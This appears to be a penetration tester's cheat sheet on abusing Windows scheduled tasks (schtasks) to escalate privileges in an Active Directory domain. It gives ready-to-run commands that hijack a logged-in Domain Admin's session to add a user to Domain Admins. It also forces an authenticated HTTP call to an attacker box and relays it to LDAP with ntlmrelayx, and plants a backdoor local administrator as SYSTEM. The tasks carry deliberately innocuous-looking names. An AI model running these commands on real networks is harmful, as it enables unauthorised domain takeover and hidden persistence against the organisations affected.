# schtasks

Can be used for privesc LOL! This article covers it pretty well.

# Queue up a scheduled net.exe privesc task by abusing a DA who is logged in interactively

Check who's logged in (and look for a DA):

Get-Process -IncludeUserName explorer | Select-Object UserName

Queue up the task:

schtasks /create /tn "TotallyFineTask" /tr 'net group "Domain Admins" lowpriv /add /domain' /sc once /st 12:00 /ru "DOMAIN\a-domain-admin" /it /f

Run it:

schtasks /run /tn "TotallyFineTask"

# Queue up a scheduled HTTP-based privesc task by abusing a DA who is logged in interactively

This is handy when you want to coerce a logged-in DA to do an HTTP call to your attacking box so you can relay to LDAP with ntlmrelayx:

schtasks /create /tn "TotallyFineNotSus" /tr "powershell.exe IWR http://your-kali-ip -UseDefaultCredentials" /sc once /st 12:00 /ru "DOMAIN\a-domain-admin" /it /f

In another window have something like this going:

ntlmrelayx -t ldap://ip.of.a.domaincontroller -debug --escalate-user lowpriv

Then fire the schtask!

schtasks /run /tn "TotallyFineNotSus"

# Queue up a scheduled task when you have NT AUTHORITY\SYSTEM privileges

Sometimes you might get on a box with NT AUTHORITY\SYSTEM permissions and have problems running net.exe to create a back door local admin or add a domain user to a local admin group. In cases like these you can use the scheduled task trick, but this time set the /ru to be SYSTEM like so:

schtasks /create /tn "TotallyFineMaintenanceNotABigDeal" /tr "net localgroup administrators SuperSecretLocalAdmin /add" /sc once /st 12:00 /ru SYSTEM /f

# Get details on when the task last ran

Tells you when it last ran, error codes, etc:

schtasks /query /tn "Sometask" /v /fo LIST

# Find all tasks that start with certain characters

For example, if you queued up a bunch of tasks that started with DB you could list them with:

EXEC xp_cmdshell 'schtasks /query | findstr /i "DB"';

# Delete a scheduled task

schtasks /delete /TN "MyTaskName" /F